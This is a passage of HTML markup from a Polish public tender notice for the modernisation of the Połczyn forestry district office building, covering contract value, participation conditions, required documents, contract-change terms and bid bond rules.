black;border-collapse: collapse;'>45262700-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311100-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45312100-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45312200-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45312310-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45314200-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45312311-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45316000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233142-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233226-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311100-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc">2894967,36</span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiającyprzewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 PZP w wysokości nie większej niż 20%wartości poszczególnych części zamówienia.Zamówienia te polegać będą na powtórzeniu robót podobnych do robótstanowiących przedmiot niniejszego zamówienia. Zamówienia, o których mowa powyżej będą udzielane w przypadkuwystąpienia potrzeby zwiększenia zakresu rzeczowego robót budowlanych stanowiących przedmiot zamówienia na skutekwarunków przyrodniczych bądź atmosferycznych, konieczności zastosowania odmiennych rozwiązań projektowych, jak równieżcelem zabezpieczenia niezbędnego wykonawstwa prac oraz w przypadku powierzania Wykonawcy prac stanowiącychwykonawstwo zastępcze w stosunku do prac realizowanych przez innego wykonawcę.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-08-07</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-08-07</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1. Rozpoczęcie realizacji zamówienia nastąpi w dniu protokolarnego przekazania terenu budowyWykonawcy. Przekazanie nastąpi na podstawie przygotowanego przez Zamawiającego Protokołu przekazania terenu budowy wdniu podpisania Umowy. 2. Zakończenie budowy i zgłoszenie przez Wykonawcę gotowości do końcowego odbioru robót nastąpido dnia 09.06.2020 roku. Obowiązkiem Wykonawcy jest wykonanie prac zgodnie z zaakceptowanym harmonogramemrzeczowo-finansowym robót budowlanych. 3. W terminie do dnia 23.06.2020 roku Wykonawca zobowiązany jest dokonać wraz zZamawiającym odbiorów budowlanych i przekazać Zamawiającemu kompletny operat kolaudacyjny. 4. Do dnia 07.08.2020 rokuWykonawca zobowiązany jest uzyskać w imieniu Zamawiającego decyzję - pozwolenie na użytkowanie obiektu. To terminostatecznego zakończenia zamówienia. 5. Do dokumentacji odbioru końcowego zalicza się: a) oryginał dziennika/ów budowy, b)atesty, certyfikaty, aprobaty techniczne i deklaracje zgodności na prefabrykaty, materiały i urządzenia, c) ewentualne rysunkipowykonawcze przeprowadzonych robót, c) oświadczenie Wykonawcy o zgodności wykonania robót z przepisami iobowiązującymi Polskimi Normami d) kserokopia uprawnień wraz z kserokopią aktualnego zaświadczenia o przynależności dowłaściwej izby samorządu zawodowego, e) karty gwarancyjne. Do całkowitej wartości zamówienia została doliczona wartośćewentualnych zamówień z art. 67 ust. 1 pkt 6 Pzp</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający odstępuje od opisu sposobu dokonania oceny spełniania warunków w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału wpostępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej. Warunek w odniesieniu do sytuacji finansowej,zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje środkami finansowymi lub zdolnością kredytową nie mniejszą niż:- 700 000,00 zł.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływemterminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie): - zrealizował zgodnie zzasadami sztuki budowlanej i prawidłowo ukończył co najmniej 2 roboty budowlane (przez robotę rozumie się wykonywanieprac na podstawie 1 umowy) polegające na budowie lub przebudowie budynku mieszkalnego, zamieszkania zbiorowego lubużyteczności publicznej (zdefiniowanych w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunkówtechnicznych jakimi powinny odpowiadać budynki i ich usytuowanie (Dz.U.2015.0.1422), na kwotę nie mniejszą niż1.500.000,00 brutto zł każda (bez robót zagospodarowania terenu). Warunek ten, w zakresie dysponowania potencjałemtechnicznym: Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania tego warunku udziału wpostępowaniu. Warunek ten, w zakresie dysponowania osobami zdolnymi do wykonania zamówienia zostanie spełniony, jeśliWykonawca wykaże, że dysponuje: a) co najmniej 1 osobą, która będzie pełnić funkcję kierownika budowy, posiadającąuprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń, zdoświadczeniem minimum 5 lat; b) co najmniej 1 osobą, która będzie pełnić funkcję kierownika robót, posiadającąuprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeńcieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, z doświadczeniem minimum 3 lat; c) co najmniej 1osobą, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia do kierowania robotami budowlanymi wspecjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, z doświadczeniemminimum 3 lat; d) co najmniej 1 osobą, która będzie pełnić funkcję kierownika robót, posiadającą uprawnienia do kierowaniarobotami budowlanymi w specjalności drogowej, z doświadczeniem minimum 3 lat . Uwaga: Kierownik budowy/Kierownikrobót powinien posiadać uprawnienia budowlane bez ograniczeń zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane(Dz.U.2018.0.1202) oraz rozporządzeniem Ministra Transportu i Budownictwa z dnia 11 września 2014 r. w sprawiesamodzielnych funkcji technicznych w budownictwie (Dz.U.2014.0.1278 z późn. zm.) lub odpowiadające im ważneuprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawyPrawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą równieżwykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisachodrębnych. Zamawiający nie dopuszcza przedstawiania w ofercie tej samej osoby do pełnienia kilku funkcji wymienionychpowyżej. Tym samym Zamawiający nie dopuszcza do pełnienia przez jedną osobę kilku funkcji z wymienionych powyżej,pomimo posiadania odpowiednich uprawnień.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1) Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 oraz ust. 5 pkt 1, 4, i 8 PZP -załącznik nr 3 do SIWZ. 2) Oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 i 2 ustawy Pzp -załącznik nr 4 do SIWZ. 3) Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalnościgospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw dowykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy Pzp, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminuskładania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy Pzp. 4) Aktualnezaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznegopotwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia,że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całościwykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.5) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega zopłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na ratyzaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3miesiące przed upływem terminu składaniaofert. 6) Aktualną informację z Krajowego Rejestru Karnego w zakresieokreślonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminuskładania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 7) Wykonawcaskłada listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp, alboinformację o tym, że nie należy do grupy kapitałowej (załącznik nr 5 do SIWZ). 8) Wykaz robót wykonanych w okresieostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tymokresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane orazzałączeniem dowodów, że roboty zostały wykonane należycie oraz wskazujących, czy zostały wykonane zgodnie z zasadamisztuki budowlanej i prawidłowo ukończone (załącznik nr 6 do SIWZ). a. Dowodami, o których mowa są: a) referencje, b) innedokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskaćpoświadczenia. b. W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny w/w wykaz. 9) Wykaz osób,które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnieńniezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz doświadczenia wraz zinformacją o podstawie do dysponowania tymi osobami oraz oświadczeniem, że osoby które będą uczestniczyć wwykonywaniu zamówienia (wymienione w wykazie osób) posiadają wymagane uprawnienia (załącznik nr 7 do SIWZ) 10)Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzające wysokość posiadanych środkówfinansowych lub zdolność kredytową Wykonawcy, wystawianą nie wcześniej niż miesiąc przed upływem terminu składaniaofert; jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowejwymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianieopisanego przez Zamawiającego warunku. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówieniawarunki opisane w pkt 8 SIWZ musi spełniać każdy z Wykonawców składających ofertę.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Po wyborze najkorzystniejszej oferty, a przed zawarciem umowy, Wykonawca, którego oferta została uznana zanajkorzystniejszą zobowiązany jest dopełnić następujących formalności: 1) przedłożyć kopię umowy konsorcjum, kopieumowy spółki cywilnej, jeżeli zamówienie będzie realizowane przez Wykonawców wspólnie ubiegających się o udzieleniezamówienia, o ile nie zostały złożone wraz z ofertą; 2) dokumenty (kopie potwierdzone ,,za zgodność z oryginałem")potwierdzające posiadanie uprawnień budowlanych zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28kwietnia 2006r w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006r nr 83 poz. 578 z późn.zm. )lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie obowiązujących przepisów, któreuprawniają do pełnienia funkcji kierownika budowy przy wykonywaniu robót budowlanych objętych przedmiotemzamówienia. Zamawiający, na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacjizawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63 poz. 394 z późn. zm.), uznaobywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich EuropejskiegoPorozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli w tychpaństwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe wymagane na ww. stanowisko, jeżelikwalifikacje te swym zakresem będą odpowiadały uprawnieniom opisanym powyżej umożliwiając pełnienie funkcjikierownika budowy przy wykonywaniu robót budowlanych objętych przedmiotem zamówienia dla osób wskazanych wzałączniku nr 7 do SIWZ; 3) dokumenty (kopie potwierdzone ,,za zgodność z oryginałem") potwierdzające posiadanieaktualnego wpisu na listę właściwej miejscowo okręgowej izby inżynierów budownictwa (dotyczy uprawnień zdobytych wkraju); 4) w przypadku, gdy Wykonawca zamierza realizować zamówienie przy pomocy podwykonawców, przed podpisaniemumowy Wykonawca przedstawi kompletną listę podwykonawców, która będzie zawierała nazwę (firmę) i adresPodwykonawcy oraz szczegółowy zakres wykonywanych prac. Wykonawca zamierzający zawrzeć umowę opodwykonawstwo, której przedmiotem są roboty budowlane objęte niniejszym przedmiotem zamówienia, jest zobowiązany doprzedłożenia Zamawiającemu projektu umowy celem akceptacji; 5) przedłożyć kopię potwierdzoną za zgodność z oryginałempolisy od odpowiedzialności cywilnej oraz polisy ubezpieczenia wszystkich ryzyk budowy (CAR- Contractor's All Risks)określonych we wzorze umowy - co stanowi bezwzględny warunek udzielenia zamówienia (podpisania umowy); 6) wnieśćwymagane zabezpieczenie należytego wykonania umowy- co stanowi bezwzględny warunek udzielenia zamówienia(podpisania umowy); 7) dokument potwierdzający uprawnienie do reprezentowania Wykonawcy, w tym ich umocowanie dopodpisania umowy, o ile umocowanie to nie wynika z dokumentów dołączonych do oferty; 8) kosztorysy uproszczoneobejmujące pełen zakres rzeczowo-finansowy przedmiotu zamówienia w wersjach: papierowej oraz elektronicznej w postaciedytowalnych plików w formacie .ath 17.2. Nieprzedłożenie któregokolwiek z dokumentów wymienionych w pkt. 17.1.traktowane będzie jako uchylanie się przez Wykonawcę od zawarcia umowy z jego winy. 18. Istotne dla stron postanowienia,które zostaną wprowadzone do treści umowy w sprawie zamówienia publicznego 18. 1. Wszelkie istotne dla stronpostanowienia zawiera wzór umowy stanowiący załącznik nr 11 do SIWZ. 18.2. Umowa zostanie zawarta na podstawiezłożonej oferty Wykonawcy. 18.3. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku dotreści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okolicznościw niej wymienionych z uwzględnieniem podanych we wzorze umowy warunków ich wprowadzenia. 18.4. Harmonogramrzeczowo-finansowy robót budowlanych może podlegać aktualizacji na wniosek każdej ze Stron Umowy w zakresieprzesunięcia terminów realizacji poszczególnych pozycji robót (etapów) lub terminu zakończenia robót, za wyjątkiemokoliczności dotyczących winy Wykonawcy. 18.5. Podjęcie przez Strony negocjacji w celu zmiany umowy w zakresieterminów realizacji poszczególnych etapów lub terminu końca obowiązywania Umowy nie uprawnia Wykonawcy doodstąpienia od Umowy oraz nie uprawnia Wykonawcy do wstrzymania lub zwolnienia tempa wykonywania robótbudowlanych. 18.6. Strony dopuszczają możliwość prolongowania terminów realizacji umowy w następujących przypadkach:1) Z winy Zamawiającego: a) w przypadku opóźnienia przez Zamawiającego przekazania terenu budowy; b) w przypadkuniewykonania obowiązków Zamawiającego wynikających z niniejszej Umowy. 2) Z przyczyn niezależnych od Wykonawcy:a) jeżeli w czasie realizacji umowy wystąpią wybitnie niesprzyjające i nietypowe dla danej pory roku warunki pogodowe,uniemożliwiające wykonanie zadania np. mrozy, opady atmosferyczne, huragany; b) wystąpią innenieprzewidzianeokoliczności mające wpływ na wykonanie zamówienia, a w szczególności niesprzyjające warunkigeologiczne, archeologiczne lub terenowe, odnalezienie niewypałów i niewybuchów, wykopaliska archeologiczne itp.; c) wprzypadku odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień zprzyczyn niezawinionych przez Wykonawcę, a niezbędnych do prawidłowej realizacji Przedmiotu Umowy; d) wskutekwystąpienia okoliczności, które mogą zostać uznane za działanie siły wyższej, rozumianej jako zewnętrzne, niemożliwe doprzewidzenia i zapobieżenia okoliczności, za które Wykonawca nie ponosi odpowiedzialności; e) nieprzewidzianej zmianyprzepisów prawa uniemożliwiających wykonanie Przedmiotu Umowy na warunkach określonych w Umowie; f) z przyczynwynikających bezpośrednio w winy Zamawiającego uniemożliwiających Wykonawcy prawidłowe wykonanie PrzedmiotuUmowy; g) w przypadku udzielenia Wykonawcy zamówienia w oparciu o art. 67 ust.1 pkt 5 Ustawy Pzp, jeśli jego wykonanie(sposób, technologia wykonania) powoduje konieczność przedłużenia terminu realizacji. 18.7. W przypadku koniecznościwprowadzenia zmian w terminie realizacji umowy, nowy termin zostanie wydłużony o czas niezawinionego przezWykonawcę przestoju. Warunkiem wydłużenia terminu realizacji umowy będzie wystąpienie przez Wykonawcę z pisemnymwnioskiem o przedłużenie terminu realizacji zamówienia wraz ze wskazaniem przyczyn uzasadniających jego przedłużenienie później niż w terminie 5 dni od daty powstania okoliczności uzasadniającej przedłużenie, pod rygorem utraty prawa dożądania przesunięcia terminu realizacji. W takim przypadku Zamawiający może pisemnie potwierdzić fakt i okres przestoju,co stanowić może podstawę do spisania stosownego aneksu przedłużającego umowę. 18.8. Strony dopuszczają możliwośćdokonania zmiany wynagrodzenia Wykonawcy w następujących przypadkach: 1) Strony dopuszczają możliwośćpodwyższenia wynagrodzenia Wykonawcy wyłącznie w przypadku zmiany obowiązujących stawek podatków VAT. W takimprzypadku cena netto Umowy nie ulegnie zmianie. O zmianie podatku VAT Wykonawca będzie zobligowany powiadomićZamawiającego pisemnie z co najmniej 7-dniowym wyprzedzeniem. 2) W przypadku, gdy niezbędne do prawidłowegowykonania Przedmiotu Umowy będzie wykonanie robót dodatkowych. W takim przypadku rozpoczęcie wykonywania tychrobót, a także zmiana wysokości wynagrodzenia Wykonawcy może nastąpić wyłącznie na podstawie podpisanego przezZamawiającego protokołu konieczności i po udzieleniu zamówienia z wolnej ręki na przedmiotowe roboty. Warunkiemzlecenia prac jest potwierdzenie konieczności ich wykonania przez Inspektora Nadzoru Inwestorskiego, Głównegoksięgowego Zamawiającego i samego Zamawiającego. Bez zatwierdzenia protokołu konieczności przez Zamawiającego,Wykonawca nie może rozpocząć wykonywania robót dodatkowych. Wynagrodzenie zostanie ustalone w oparciu o kosztorysofertowy, a w przypadku braku danej pozycji w kosztorysie według stawek SEKOCENBUD. 18.9. Wykonawca zobowiązanybędzie do niewprowadzania żadnych zmian do przekazanej mu dokumentacji technicznej bez wyraźnego pisemnego - podrygorem nieważności - polecenia Zamawiającego.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Zamawiający wymaga wniesienia wadium w wysokości: 70 000,00 PLN2. 2. Wadium może być wnoszone w jednej lubkilku następujących formach: 1) pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasyoszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4)gwarancjach ubezpieczeniowych, 5) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawyz dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz. U. z 2007 r. Nr 42,poz.275 z późniejszymi zmianami). 3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowyZamawiającego w banku BGŻ PNB PARIBAS nr rachunku 24 2030 0045 1110 0000 0033 0540 z dopiskiem: wadium nazabezpieczenie oferty w postępowaniu na ,,Modernizacja budynku biurowego Nadleśnictwa Połczyn wraz zzagospodarowaniem terenu i infrastrukturą towarzyszącą-kontynuacja". 4. Z treści wadium wnoszonego w formie: poręczeniabankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowaw art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości powinnowynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą,zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4aoraz art. 46 ust. 5 PZP. 5. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem terminu składania ofertzostanie zaliczone na rachunku bankowym Zamawiającego. Wadium wnoszone w formie innej niż pieniądz Wykonawca jestzobowiązany załączyć w oryginale do oferty przed upływem terminu składania ofert w siedzibie Zamawiającego (sekretariat).Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Wykonawca, który nie wniesie wadium lub niezabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie, zostanie wykluczony z postępowania, a jego ofertazostanie uznana za odrzuconą. 6. Treść gwarancji wadialnej musi zawierać następujące elementy: 1) nazwę dającego zlecenie(Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowejudzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, 2) określenie wierzytelności, która ma być zabezpieczonagwarancją/poręczeniem - określenie przedmiotu zamówienia 3) kwotę gwarancji/poręczenia, 4) termin ważnościgwarancji/poręczenia 5) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwotygwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 46 ust. 4a PZP orazart. 46 ust. 5 PZP . 7. Zamawiający zwróci wadium, zażąda ponownego wniesienia wadium, zatrzyma wadium zgodnie z art.46 ust. 1-5 PZP. 8. 